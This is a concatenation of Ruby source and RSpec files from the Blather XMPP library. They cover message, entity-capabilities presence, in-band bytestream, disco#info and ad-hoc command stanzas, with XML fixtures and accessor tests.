  </message>
  XML
end
# Fixture: a groupchat message carrying an urn:xmpp:delay element
# (delayed delivery) with from, stamp and description text.
def delayed_message_xml
  <<-XML
  <message
      from='<EMAIL>/firstwitch'
      id='162BEBB1-F6DB-4D9A-9BD8-CFDCC801A0B2'
      to='<EMAIL>/broom'
      type='groupchat'>
    <body>Thrice the brinded cat hath mew'd.</body>
    <delay xmlns='urn:xmpp:delay'
       from='<EMAIL>'
       stamp='2002-10-13T23:58:37Z'>
      Too slow
    </delay>
  </message>
  XML
end
# Specs for Blather::Stanza::Message: registration, import, body/subject/
# thread accessors, type validation, XHTML handling, chat states, forms
# and delayed-delivery support.
describe Blather::Stanza::Message do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:message, nil)).to eq(Blather::Stanza::Message)
  end

  it 'must be importable' do
    expect(Blather::XMPPNode.parse(message_xml)).to be_instance_of Blather::Stanza::Message
    expect(Blather::XMPPNode.parse(ichat_message_xml)).to be_instance_of Blather::Stanza::Message
  end

  it 'provides "attr_accessor" for body' do
    s = Blather::Stanza::Message.new
    expect(s.body).to be_nil
    expect(s.find('body')).to be_empty

    s.body = 'test message'
    expect(s.body).not_to be_nil
    expect(s.find('body')).not_to be_empty
  end

  it 'provides "attr_accessor" for subject' do
    s = Blather::Stanza::Message.new
    expect(s.subject).to be_nil
    expect(s.find('subject')).to be_empty

    s.subject = 'test subject'
    expect(s.subject).not_to be_nil
    expect(s.find('subject')).not_to be_empty
  end

  it 'provides "attr_accessor" for thread' do
    s = Blather::Stanza::Message.new
    expect(s.thread).to be_nil
    expect(s.find('thread')).to be_empty

    s.thread = 1234
    expect(s.thread).not_to be_nil
    expect(s.find('thread')).not_to be_empty
  end

  it 'can set a parent attribute for thread' do
    s = Blather::Stanza::Message.new
    expect(s.thread).to be_nil
    expect(s.find('thread')).to be_empty

    # a hash sets both the parent thread (key) and the thread id (value)
    s.thread = {4321 => 1234}
    expect(s.thread).to eq('1234')
    expect(s.parent_thread).to eq('4321')
    expect(s.find('thread[@parent="4321"]')).not_to be_empty
  end

  it 'ensures type is one of Blather::Stanza::Message::VALID_TYPES' do
    expect { Blather::Stanza::Message.new nil, nil, :invalid_type_name }.to raise_error(Blather::ArgumentError)

    Blather::Stanza::Message::VALID_TYPES.each do |valid_type|
      msg = Blather::Stanza::Message.new nil, nil, valid_type
      expect(msg.type).to eq(valid_type)
    end
  end

  Blather::Stanza::Message::VALID_TYPES.each do |valid_type|
    it "provides a helper (#{valid_type}?) for type #{valid_type}" do
      expect(Blather::Stanza::Message.new).to respond_to :"#{valid_type}?"
    end
  end

  it 'ensures an html node exists when asked for xhtml_node' do
    search_args = [
      '/message/html_ns:html',
      {:html_ns => Blather::Stanza::Message::HTML_NS}
    ]
    msg = Blather::Stanza::Message.new
    expect(msg.find_first(*search_args)).to be_nil

    msg.xhtml_node
    expect(msg.find_first(*search_args)).not_to be_nil
  end

  it 'ensures a body node exists when asked for xhtml_node' do
    search_args = [
      '/message/html_ns:html/body_ns:body',
      {:html_ns => Blather::Stanza::Message::HTML_NS,
      :body_ns => Blather::Stanza::Message::HTML_BODY_NS}
    ]
    msg = Blather::Stanza::Message.new
    expect(msg.find_first(*search_args)).to be_nil

    msg.xhtml_node
    expect(msg.find_first(*search_args)).not_to be_nil
  end

  it 'returns an existing node when asked for xhtml_node' do
    msg = Blather::Stanza::Message.new
    msg << (h = Blather::XMPPNode.new('html', msg.document))
    h.namespace = Blather::Stanza::Message::HTML_NS
    b = Blather::XMPPNode.new('body', msg.document)
    b.namespace = Blather::Stanza::Message::HTML_BODY_NS
    h << b

    expect(msg.xhtml_node).to eq(b)
  end

  it 'has an xhtml setter' do
    msg = Blather::Stanza::Message.new
    xhtml = "<some>xhtml</some>"
    msg.xhtml = xhtml
    expect(msg.xhtml_node.inner_html.strip).to eq(xhtml)
  end

  it 'sets valid xhtml even if the input is not valid' do
    msg = Blather::Stanza::Message.new
    xhtml = "<some>xhtml"
    msg.xhtml = xhtml
    expect(msg.xhtml_node.inner_html.strip).to eq("<some>xhtml</some>")
  end

  it 'sets xhtml with more than one root node' do
    msg = Blather::Stanza::Message.new
    xhtml = "<i>xhtml</i> more xhtml"
    msg.xhtml = xhtml
    expect(msg.xhtml_node.inner_html.strip).to eq("<i>xhtml</i> more xhtml")
  end

  it 'has an xhtml getter' do
    msg = Blather::Stanza::Message.new
    xhtml = "<some>xhtml</some>"
    msg.xhtml = xhtml
    expect(msg.xhtml).to eq(xhtml)
  end

  it 'finds xhtml body when html wrapper has wrong namespace' do
    msg = Blather::XMPPNode.parse(ichat_message_xml)
    expect(Nokogiri::XML(msg.xhtml).to_xml).to eq(Nokogiri::XML("<span style=\"font-family: 'Arial';font-size: 12px;color: #262626;\">Hello</span>\n        <img alt=\"f5ad3a04d218d7160fa02415e02d41b3.jpg\" src=\"message-attachments:1\" width=\"30\" height=\"30\"></img>").to_xml)
  end

  it 'has a chat state setter' do
    msg = Blather::Stanza::Message.new
    msg.chat_state = :composing
    expect(msg.xpath('ns:composing', :ns => Blather::Stanza::Message::CHAT_STATE_NS)).not_to be_empty
  end

  it 'will only add one chat state at a time' do
    msg = Blather::Stanza::Message.new
    msg.chat_state = :composing
    msg.chat_state = :paused

    expect(msg.xpath('ns:*', :ns => Blather::Stanza::Message::CHAT_STATE_NS).size).to eq(1)
  end

  it 'ensures chat state setter accepts strings' do
    msg = Blather::Stanza::Message.new
    msg.chat_state = "gone"
    expect(msg.xpath('ns:gone', :ns => Blather::Stanza::Message::CHAT_STATE_NS)).not_to be_empty
  end

  it 'ensures chat state is one of Blather::Stanza::Message::VALID_CHAT_STATES' do
    expect do
      msg = Blather::Stanza::Message.new
      msg.chat_state = :invalid_chat_state
    end.to raise_error(Blather::ArgumentError)

    Blather::Stanza::Message::VALID_CHAT_STATES.each do |valid_chat_state|
      msg = Blather::Stanza::Message.new
      msg.chat_state = valid_chat_state
      expect(msg.chat_state).to eq(valid_chat_state)
    end
  end

  it 'has a chat state getter' do
    msg = Blather::Stanza::Message.new
    msg.chat_state = :paused
    expect(msg.chat_state).to eq(:paused)
  end

  it 'imports correct chat state' do
    expect(Blather::XMPPNode.parse(message_xml).chat_state).to eq(:paused)
  end

  it 'makes a form child available' do
    n = Blather::XMPPNode.parse(message_xml)
    expect(n.form.fields.size).to eq(1)
    expect(n.form.fields.map { |f| f.class }.uniq).to eq([Blather::Stanza::X::Field])
    expect(n.form).to be_instance_of Blather::Stanza::X

    r = Blather::Stanza::Message.new
    r.form.type = :form
    expect(r.form.type).to eq(:form)
  end

  it 'ensures the form child is a direct child' do
    r = Blather::Stanza::Message.new
    r.form
    expect(r.xpath('ns:x', :ns => Blather::Stanza::X.registered_ns)).not_to be_empty
  end

  it 'is not delayed' do
    n = Blather::XMPPNode.parse(message_xml)
    expect(n.delay).to eq(nil)
    expect(n.delayed?).to eq(false)
  end

  describe "with a delay" do
    it "is delayed" do
      n = Blather::XMPPNode.parse(delayed_message_xml)
      expect(n.delayed?).to eq(true)
      expect(n.delay).to be_instance_of Blather::Stanza::Message::Delay
      expect(n.delay.from).to eq('<EMAIL>')
      expect(n.delay.stamp).to eq(Time.utc(2002, 10, 13, 23, 58, 37, 0))
      expect(n.delay.description).to eq("Too slow")
    end
  end
end
<file_sep>/lib/blather/stanza/presence/c.rb
module Blather
class Stanza
class Presence

  # # Entity Capabilities Stanza
  #
  # [XEP-0115 - Entity Capabilities](http://xmpp.org/extensions/xep-0115.html)
  #
  # Blather handles c nodes through this class. It provides a set of helper methods
  # to quickly deal with capabilities presence stanzas.
  #
  # @handler :c
  class C < Presence
    register :c, :c, 'http://jabber.org/protocol/caps'

    # @private
    # Hash algorithms XEP-0115 permits for generating the ver string.
    VALID_HASH_TYPES = %w[md2 md5 sha-1 sha-224 sha-256 sha-384 sha-512].freeze

    # Create a new C (capabilities) presence stanza
    #
    # @param [String, nil] node the node URI identifying the client software
    # @param [String, nil] ver the verification string
    # @param [String] hash the hash algorithm used for ver (defaults to 'sha-1')
    # @return [Blather::Stanza::Presence::C]
    def self.new(node = nil, ver = nil, hash = 'sha-1')
      new_node = super()
      new_node.c
      new_node.hash = hash
      new_node.node = node
      new_node.ver = ver
      # NOTE(review): serializes and re-parses the freshly built stanza —
      # presumably so XMPPNode.parse re-runs class registration against the
      # <c/> child; confirm before changing.
      parse new_node.to_xml
    end

    module InstanceMethods
      # @private
      # Drop any existing <c/> child before inheriting so the inherited
      # node's <c/> is not duplicated.
      def inherit(node)
        c.remove
        super
        self
      end

      # Get the name of the node
      #
      # @return [String, nil]
      def node
        c[:node]
      end

      # Set the name of the node
      #
      # @param [String, nil] node the new node name
      def node=(node)
        c[:node] = node
      end

      # Get the name of the hash
      #
      # NOTE: this getter shadows Object#hash on instances of this class.
      #
      # @return [Symbol, nil]
      def hash
        c[:hash] && c[:hash].to_sym
      end

      # Set the name of the hash
      #
      # @param [String, nil] hash the new hash name
      # @raise [ArgumentError] if hash is not one of VALID_HASH_TYPES
      def hash=(hash)
        if hash && !VALID_HASH_TYPES.include?(hash.to_s)
          raise ArgumentError, "Invalid Hash Type (#{hash}), use: #{VALID_HASH_TYPES*' '}"
        end
        c[:hash] = hash
      end

      # Get the ver
      #
      # @return [String, nil]
      def ver
        c[:ver]
      end

      # Set the ver
      #
      # @param [String, nil] ver the new ver
      def ver=(ver)
        c[:ver] = ver
      end

      # C node accessor
      # If a c node exists it will be returned.
      # Otherwise a new node will be created and returned
      #
      # @return [Blather::XMPPNode]
      def c
        unless c = find_first('ns:c', :ns => C.registered_ns)
          self << (c = XMPPNode.new('c', self.document))
          c.namespace = self.class.registered_ns
        end
        c
      end
    end

    include InstanceMethods
  end # C
end #Presence
end #Stanza
end
<file_sep>/spec/blather/stanza/iq/ibb_spec.rb
require 'spec_helper'
# Fixture: IBB session-open IQ (XEP-0047 <open/> with block-size and sid).
def ibb_open_xml
<<-XML
<iq from='<EMAIL>/orchard'
id='jn3h8g65'
to='<EMAIL>/balcony'
type='set'>
<open xmlns='http://jabber.org/protocol/ibb'
block-size='4096'
sid='i781hf64'
stanza='iq'/>
</iq>
XML
end

# Fixture: IBB data-transfer IQ carrying a base64 payload chunk (seq 0).
def ibb_data_xml
<<-XML
<iq from='<EMAIL>/orchard'
id='kr91n475'
to='<EMAIL>/balcony'
type='set'>
<data xmlns='http://jabber.org/protocol/ibb' seq='0' sid='i781hf64'>
qANQR1DBwU4DX7jmYZnncmUQB/9KuKBddzQH+tZ1ZywKK0yHKnq57kWq+RFtQdCJ
WpdWpR0uQsuJe7+vh3NWn59/gTc5MDlX8dS9p0ovStmNcyLhxVgmqS8ZKhsblVeu
IpQ0JgavABqibJolc3BKrVtVV1igKiX/N7Pi8RtY1K18toaMDhdEfhBRzO/XB0+P
AQhYlRjNacGcslkhXqNjK5Va4tuOAPy2n1Q8UUrHbUd0g+xJ9Bm0G0LZXyvCWyKH
kuNEHFQiLuCY6Iv0myq6iX6tjuHehZlFSh80b5BVV9tNLwNR5Eqz1klxMhoghJOA
</data>
</iq>
XML
end

# Fixture: IBB session-close IQ for the same sid as the open fixture.
def ibb_close_xml
<<-XML
<iq from='<EMAIL>/orchard'
id='us71g45j'
to='<EMAIL>/balcony'
type='set'>
<close xmlns='http://jabber.org/protocol/ibb' sid='i781hf64'/>
</iq>
XML
end
# Each IBB stanza class registers for its child element in the IBB
# namespace, can be imported from raw XML, exposes the child element and
# the session id, and strips the child when building a reply.
describe Blather::Stanza::Iq::Ibb::Open do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:open, 'http://jabber.org/protocol/ibb')).to eq(Blather::Stanza::Iq::Ibb::Open)
  end

  it 'can be imported' do
    node = Blather::XMPPNode.parse ibb_open_xml
    expect(node).to be_instance_of Blather::Stanza::Iq::Ibb::Open
  end

  it 'has open node' do
    node = Blather::XMPPNode.parse ibb_open_xml
    expect(node.open).to be_kind_of Nokogiri::XML::Element
  end

  it 'can get sid' do
    node = Blather::XMPPNode.parse ibb_open_xml
    expect(node.sid).to eq('i781hf64')
  end

  it 'deleted open node on reply' do
    node = Blather::XMPPNode.parse ibb_open_xml
    reply = node.reply
    expect(reply.open).to be_nil
  end
end

describe Blather::Stanza::Iq::Ibb::Data do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:data, 'http://jabber.org/protocol/ibb')).to eq(Blather::Stanza::Iq::Ibb::Data)
  end

  it 'can be imported' do
    node = Blather::XMPPNode.parse ibb_data_xml
    expect(node).to be_instance_of Blather::Stanza::Iq::Ibb::Data
  end

  it 'has data node' do
    node = Blather::XMPPNode.parse ibb_data_xml
    expect(node.data).to be_kind_of Nokogiri::XML::Element
  end

  it 'can get sid' do
    node = Blather::XMPPNode.parse ibb_data_xml
    expect(node.sid).to eq('i781hf64')
  end

  it 'deleted data node on reply' do
    node = Blather::XMPPNode.parse ibb_data_xml
    reply = node.reply
    expect(reply.data).to be_nil
  end
end

describe Blather::Stanza::Iq::Ibb::Close do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:close, 'http://jabber.org/protocol/ibb')).to eq(Blather::Stanza::Iq::Ibb::Close)
  end

  it 'can be imported' do
    node = Blather::XMPPNode.parse ibb_close_xml
    expect(node).to be_instance_of Blather::Stanza::Iq::Ibb::Close
  end

  it 'has close node' do
    node = Blather::XMPPNode.parse ibb_close_xml
    expect(node.close).to be_kind_of Nokogiri::XML::Element
  end

  it 'can get sid' do
    node = Blather::XMPPNode.parse ibb_close_xml
    expect(node.sid).to eq('i781hf64')
  end

  it 'deleted close node on reply' do
    node = Blather::XMPPNode.parse ibb_close_xml
    reply = node.reply
    expect(reply.close).to be_nil
  end
end
<file_sep>/spec/blather/stanza/discos/disco_info_spec.rb
require 'spec_helper'
# Fixture: a disco#info result IQ with one identity (client/pc) and two
# features, used throughout the DiscoInfo examples below.
def disco_info_xml
<<-XML
<iq type='result'
from='<EMAIL>/orchard'
to='<EMAIL>/balcony'
id='info4'>
<query xmlns='http://jabber.org/protocol/disco#info'>
<identity
category='client'
type='pc'
name='Gabber'
xml:lang='en'/>
<feature var='jabber:iq:time'/>
<feature var='jabber:iq:version'/>
</query>
</iq>
XML
end
describe Blather::Stanza::Iq::DiscoInfo do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:query, 'http://jabber.org/protocol/disco#info')).to eq(Blather::Stanza::Iq::DiscoInfo)
  end

  it 'must be importable' do
    expect(Blather::XMPPNode.parse(disco_info_xml)).to be_instance_of Blather::Stanza::Iq::DiscoInfo
  end

  it 'has a node attribute' do
    n = Blather::Stanza::Iq::DiscoInfo.new nil, 'music', [], []
    expect(n.node).to eq('music')
    n.node = :foo
    expect(n.node).to eq('foo')
  end

  # Inheriting from a parsed stanza wraps each child in its typed class.
  it 'inherits a list of identities' do
    n = parse_stanza disco_info_xml
    r = Blather::Stanza::Iq::DiscoInfo.new.inherit n.root
    expect(r.identities.size).to eq(1)
    expect(r.identities.map { |i| i.class }.uniq).to eq([Blather::Stanza::Iq::DiscoInfo::Identity])
  end

  it 'inherits a list of features' do
    n = parse_stanza disco_info_xml
    r = Blather::Stanza::Iq::DiscoInfo.new.inherit n.root
    expect(r.features.size).to eq(2)
    expect(r.features.map { |i| i.class }.uniq).to eq([Blather::Stanza::Iq::DiscoInfo::Feature])
  end

  it 'is constructed properly' do
    n = Blather::Stanza::Iq::DiscoInfo.new :get, '/path/to/node'
    n.to = '<EMAIL>'
    expect(n.find("/iq[@to='<EMAIL>' and @type='get' and @id='#{n.id}']/ns:query[@node='/path/to/node']", :ns => Blather::Stanza::Iq::DiscoInfo.registered_ns)).not_to be_empty
  end

  # Setters accept hashes/objects, += appends, and nil clears the list.
  it 'allows adding of identities' do
    di = Blather::Stanza::Iq::DiscoInfo.new
    expect(di.identities.size).to eq(0)
    di.identities = [{:name => 'name', :type => 'type', :category => 'category'}]
    expect(di.identities.size).to eq(1)
    di.identities += [Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category])]
    expect(di.identities.size).to eq(2)
    di.identities = nil
    expect(di.identities.size).to eq(0)
  end

  it 'allows adding of features' do
    di = Blather::Stanza::Iq::DiscoInfo.new
    expect(di.features.size).to eq(0)
    di.features = ["feature1"]
    expect(di.features.size).to eq(1)
    di.features += [Blather::Stanza::Iq::DiscoInfo::Feature.new("feature2")]
    expect(di.features.size).to eq(2)
    di.features = nil
    expect(di.features.size).to eq(0)
  end
end

# The constructor's identities argument accepts hashes, Identity objects,
# single values, or any mix of those.
describe 'Blather::Stanza::Iq::DiscoInfo identities' do
  it 'takes a list of hashes for identities' do
    ids = [
      {:name => 'name', :type => 'type', :category => 'category'},
      {:name => 'name1', :type => 'type1', :category => 'category1'},
    ]

    control = [ Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category]),
                Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name1 type1 category1])]

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, ids
    expect(di.identities.size).to eq(2)
    di.identities.each { |i| expect(control.include?(i)).to eq(true) }
  end

  it 'takes a list of Identity objects as identities' do
    control = [ Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category]),
                Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name1 type1 category1])]

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, control
    expect(di.identities.size).to eq(2)
    di.identities.each { |i| expect(control.include?(i)).to eq(true) }
  end

  it 'takes a single hash as identity' do
    control = [Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category])]

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, {:name => 'name', :type => 'type', :category => 'category'}
    expect(di.identities.size).to eq(1)
    di.identities.each { |i| expect(control.include?(i)).to eq(true) }
  end

  it 'takes a single identity object as identity' do
    control = [Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category])]

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, control.first
    expect(di.identities.size).to eq(1)
    di.identities.each { |i| expect(control.include?(i)).to eq(true) }
  end

  it 'takes a mix of hashes and identity objects as identities' do
    ids = [
      {:name => 'name', :type => 'type', :category => 'category'},
      Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name1 type1 category1]),
    ]

    control = [ Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category]),
                Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name1 type1 category1])]

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, ids
    expect(di.identities.size).to eq(2)
    di.identities.each { |i| expect(control.include?(i)).to eq(true) }
  end
end

# The constructor's features argument is equally permissive: strings,
# Feature objects, single values, or a mix.
describe 'Blather::Stanza::Iq::DiscoInfo features' do
  it 'takes a list of features as strings' do
    features = %w[feature1 feature2 feature3]
    control = features.map { |f| Blather::Stanza::Iq::DiscoInfo::Feature.new f }

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], features
    expect(di.features.size).to eq(3)
    di.features.each { |f| expect(control.include?(f)).to eq(true) }
  end

  it 'takes a list of features as Feature objects' do
    features = %w[feature1 feature2 feature3]
    control = features.map { |f| Blather::Stanza::Iq::DiscoInfo::Feature.new f }

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], control
    expect(di.features.size).to eq(3)
    di.features.each { |f| expect(control.include?(f)).to eq(true) }
  end

  it 'takes a single string' do
    control = [Blather::Stanza::Iq::DiscoInfo::Feature.new('feature1')]

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], 'feature1'
    expect(di.features.size).to eq(1)
    di.features.each { |f| expect(control.include?(f)).to eq(true) }
  end

  it 'takes a single Feature object' do
    control = [Blather::Stanza::Iq::DiscoInfo::Feature.new('feature1')]

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], control.first
    expect(di.features.size).to eq(1)
    di.features.each { |f| expect(control.include?(f)).to eq(true) }
  end

  it 'takes a mixed list of features as Feature objects and strings' do
    features = %w[feature1 feature2 feature3]
    control = features.map { |f| Blather::Stanza::Iq::DiscoInfo::Feature.new f }
    features[1] = control[1]

    di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], features
    expect(di.features.size).to eq(3)
    di.features.each { |f| expect(control.include?(f)).to eq(true) }
  end
end

describe Blather::Stanza::Iq::DiscoInfo::Identity do
  it 'will auto-inherit nodes' do
    n = parse_stanza "<identity name='Personal Events' type='pep' category='pubsub' node='publish' xml:lang='en' />"
    i = Blather::Stanza::Iq::DiscoInfo::Identity.new n.root
    expect(i.name).to eq('Personal Events')
    expect(i.type).to eq(:pep)
    expect(i.category).to eq(:pubsub)
    expect(i.xml_lang).to eq('en')
  end

  it 'has a category attribute' do
    n = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat])
    expect(n.category).to eq(:cat)
    n.category = :foo
    expect(n.category).to eq(:foo)
  end

  it 'has a type attribute' do
    n = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat])
    expect(n.type).to eq(:type)
    n.type = :foo
    expect(n.type).to eq(:foo)
  end

  it 'has a name attribute' do
    n = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat])
    expect(n.name).to eq('name')
    n.name = :foo
    expect(n.name).to eq('foo')
  end

  it 'has an xml:lang attribute' do
    n = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat en])
    expect(n.xml_lang).to eq('en')
    n.xml_lang = 'de'
    expect(n.xml_lang).to eq('de')
  end

  it 'can determine equality' do
    a = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat])
    expect(a).to eq(Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat]))
    expect(a).not_to equal Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[not-name not-type not-cat])
  end
end

describe Blather::Stanza::Iq::DiscoInfo::Feature do
  it 'will auto-inherit nodes' do
    n = parse_stanza "<feature var='ipv6' />"
    i = Blather::Stanza::Iq::DiscoInfo::Feature.new n.root
    expect(i.var).to eq('ipv6')
  end

  it 'has a var attribute' do
    n = Blather::Stanza::Iq::DiscoInfo::Feature.new 'var'
    expect(n.var).to eq('var')
    n.var = :foo
    expect(n.var).to eq('foo')
  end

  it 'can determine equality' do
    a = Blather::Stanza::Iq::DiscoInfo::Feature.new('var')
    expect(a).to eq(Blather::Stanza::Iq::DiscoInfo::Feature.new('var'))
    expect(a).not_to equal Blather::Stanza::Iq::DiscoInfo::Feature.new('not-var')
  end
end
<file_sep>/lib/blather/stanza/iq/command.rb
module Blather
class Stanza
class Iq

  # # Command Stanza
  #
  # [XEP-0050 Ad-Hoc Commands](http://xmpp.org/extensions/xep-0050.html)
  #
  # This is a base class for any command based Iq stanzas. It provides a base set
  # of methods for working with command stanzas
  #
  # @handler :command
  class Command < Iq
    # @private
    VALID_ACTIONS = [:cancel, :execute, :complete, :next, :prev].freeze
    # @private
    VALID_STATUS = [:executing, :completed, :canceled].freeze
    # @private
    VALID_NOTE_TYPES = [:info, :warn, :error].freeze

    register :command, :command, 'http://jabber.org/protocol/commands'

    # Overrides the parent method to ensure a command node is created
    #
    # @param [:get, :set, :result, :error, nil] type the IQ type
    # @param [String] node the name of the node
    # @param [:cancel, :execute, :complete, :next, :prev, nil] action the command's action
    # @return [Command] a new Command stanza
    def self.new(type = :set, node = nil, action = :execute)
      new_node = super type
      new_node.command
      new_node.node = node
      new_node.action = action
      new_node
    end

    # Overrides the parent method to ensure the current command node is destroyed
    # and the action is set to execute if no action provided
    #
    # @see Blather::Stanza::Iq#inherit
    def inherit(node)
      command.remove
      super
      self.action = :execute unless self.action
      self
    end

    # Overrides the parent method to ensure the reply has no action
    #
    # @param [Hash] opts options to pass to reply!
    # @option opts [Boolean] :remove_children Whether or not to remove child nodes when replying
    #
    # @return [self]
    def reply!(opts = {})
      opts = {:remove_children => false}.merge opts
      super
      self.action = nil
      self.command.children.remove
      new_sessionid! if !sessionid
      self
    end

    # Command node accessor
    # If a command node exists it will be returned.
    # Otherwise a new node will be created and returned
    #
    # @return [Blather::XMPPNode]
    def command
      c = if self.class.registered_ns
        find_first('ns:command', :ns => self.class.registered_ns)
      else
        find_first('command')
      end

      unless c
        (self << (c = XMPPNode.new('command', self.document)))
        c.namespace = self.class.registered_ns
      end
      c
    end

    # Get the name of the node
    #
    # @return [String, nil]
    def node
      command[:node]
    end

    # Set the name of the node
    #
    # @param [String, nil] node the new node name
    def node=(node)
      command[:node] = node
    end

    # Get the sessionid of the command
    #
    # @return [String, nil]
    def sessionid
      command[:sessionid]
    end

    # Check if there is a sessionid set
    #
    # @return [true, false]
    def sessionid?
      !sessionid.nil?
    end

    # Set the sessionid of the command
    #
    # NOTE: stores the SHA-1 hex digest of the given value, not the raw value.
    #
    # @param [String, nil] sessionid the new sessionid
    def sessionid=(sessionid)
      command[:sessionid] = Digest::SHA1.hexdigest(sessionid)
    end

    # Generate a new session ID (SHA-1 hash)
    def new_sessionid!
      self.sessionid = "commandsession-#{id}"
    end

    # Get the action of the command
    #
    # @return [Symbol, nil]
    def action
      (val = command[:action]) && val.to_sym
    end

    # Check if the command action is :cancel
    #
    # @return [true, false]
    def cancel?
      self.action == :cancel
    end

    # Check if the command action is :execute
    #
    # @return [true, false]
    def execute?
      self.action == :execute
    end

    # Check if the command action is :complete
    #
    # @return [true, false]
    def complete?
      self.action == :complete
    end

    # Check if the command action is :next
    #
    # @return [true, false]
    def next?
      self.action == :next
    end

    # Check if the command action is :prev
    #
    # @return [true, false]
    def prev?
      self.action == :prev
    end

    # Set the action of the command
    #
    # @param [:cancel, :execute, :complete, :next, :prev] action the new action
    # @raise [ArgumentError] if action is not one of VALID_ACTIONS
    def action=(action)
      if action && !VALID_ACTIONS.include?(action.to_sym)
        raise ArgumentError, "Invalid Action (#{action}), use: #{VALID_ACTIONS*' '}"
      end
      command[:action] = action
    end

    # Get the status of the command (defaults to :executing when unset)
    #
    # @return [Symbol]
    def status
      ((val = command[:status]) && val.to_sym) || :executing
    end

    # Check if the command status is :executing
    #
    # @return [true, false]
    def executing?
      self.status == :executing
    end

    # Check if the command status is :completed
    #
    # @return [true, false]
    def completed?
      self.status == :completed
    end

    # Check if the command status is :canceled
    #
    # @return [true, false]
    def canceled?
      self.status == :canceled
    end

    # Set the status of the command
    #
    # @param [:executing, :completed, :canceled] status the new status
    # @raise [ArgumentError] if status is not one of VALID_STATUS
    def status=(status)
      if status && !VALID_STATUS.include?(status.to_sym)
        # FIX: message previously read "Invalid Action"
        raise ArgumentError, "Invalid Status (#{status}), use: #{VALID_STATUS*' '}"
      end
      command[:status] = status
    end

    # Command actions accessor
    # If a command actions element exists it will be returned.
    # Otherwise a new actions element will be created and returned
    #
    # @return [Blather::XMPPNode]
    def actions
      unless a = self.command.find_first('ns:actions', :ns => self.class.registered_ns)
        (self.command << (a = XMPPNode.new('actions', self.document)))
        a.namespace = self.command.namespace
      end
      a
    end

    # Get the command's allowed actions (always includes :execute)
    #
    # @return [Array<Symbol>]
    def allowed_actions
      ([:execute] + actions.children.map { |action| action.name.to_sym }).uniq
    end

    # Get the primary allowed action
    #
    # @return [Symbol]
    def primary_allowed_action
      (actions[:execute] || :execute).to_sym
    end

    # Set the primary allowed action
    #
    # This must be one of :prev, :next, :complete or :execute
    #
    # @param [#to_sym] a the primary allowed action
    def primary_allowed_action=(a)
      a = a.to_sym
      if a && ![:prev, :next, :complete, :execute].include?(a)
        raise ArgumentError, "Invalid Action (#{a}), use: #{[:prev, :next, :complete, :execute]*' '}"
      end
      actions[:execute] = a
    end

    # Add allowed actions to the command
    #
    # @param [[:prev, :next, :complete]] allowed_actions the new allowed actions
    def allowed_actions=(allowed_actions)
      allowed_actions = ([allowed_actions].flatten.map(&:to_sym) + [:execute]).uniq
      if (invalid_actions = allowed_actions - VALID_ACTIONS).size > 0
        raise ArgumentError, "Invalid Action(s) (#{invalid_actions*' '}), use: #{VALID_ACTIONS*' '}"
      end

      actions.children.map(&:remove)
      allowed_actions.each { |action| actions << XMPPNode.new(action.to_s) }
    end

    # Remove the actions element (and thus all explicitly allowed actions)
    # from the command
    def remove_allowed_actions!
      actions.remove
    end

    # Command note accessor
    # If a command note exists it will be returned.
    # Otherwise a new note will be created and returned
    #
    # @return [Blather::XMPPNode]
    def note
      unless n = self.command.find_first('ns:note', :ns => self.class.registered_ns)
        (self.command << (n = XMPPNode.new('note', self.document)))
        n.namespace = self.command.namespace
      end
      n
    end

    # Get the note_type of the command
    #
    # @return [Symbol, nil]
    def note_type
      (val = note[:type]) && val.to_sym
    end

    # Check if the command note type is :info
    #
    # @return [true, false]
    def info?
      self.note_type == :info
    end

    # Check if the command note type is :warn
    #
    # @return [true, false]
    def warn?
      # FIX: previously compared self.status == :warn, which can never be
      # true (VALID_STATUS has no :warn), so this predicate always returned
      # false. Note types, not statuses, may be :warn.
      self.note_type == :warn
    end

    # Check if the command note type is :error
    #
    # @return [true, false]
    def error?
      # FIX: same defect as #warn? — compare against note_type, not status.
      self.note_type == :error
    end

    # Set the note_type of the command
    #
    # @param [:info, :warn, :error] note_type the new note_type
    # @raise [ArgumentError] if note_type is not one of VALID_NOTE_TYPES
    def note_type=(note_type)
      if note_type && !VALID_NOTE_TYPES.include?(note_type.to_sym)
        # FIX: message previously read "Invalid Action"
        raise ArgumentError, "Invalid Note Type (#{note_type}), use: #{VALID_NOTE_TYPES*' '}"
      end
      note[:type] = note_type
    end

    # Get the text of the command's note
    def note_text
      command.content_from('ns:note', ns: self.class.registered_ns)
    end

    # Set the command's note text
    #
    # @param [String] note_text the command's new note text
    def note_text=(note_text)
      note.content = note_text
    end

    # Returns the command's x:data form child
    def form
      X.find_or_create command
    end
  end #Command
end #Iq
end #Stanza
end #Blather
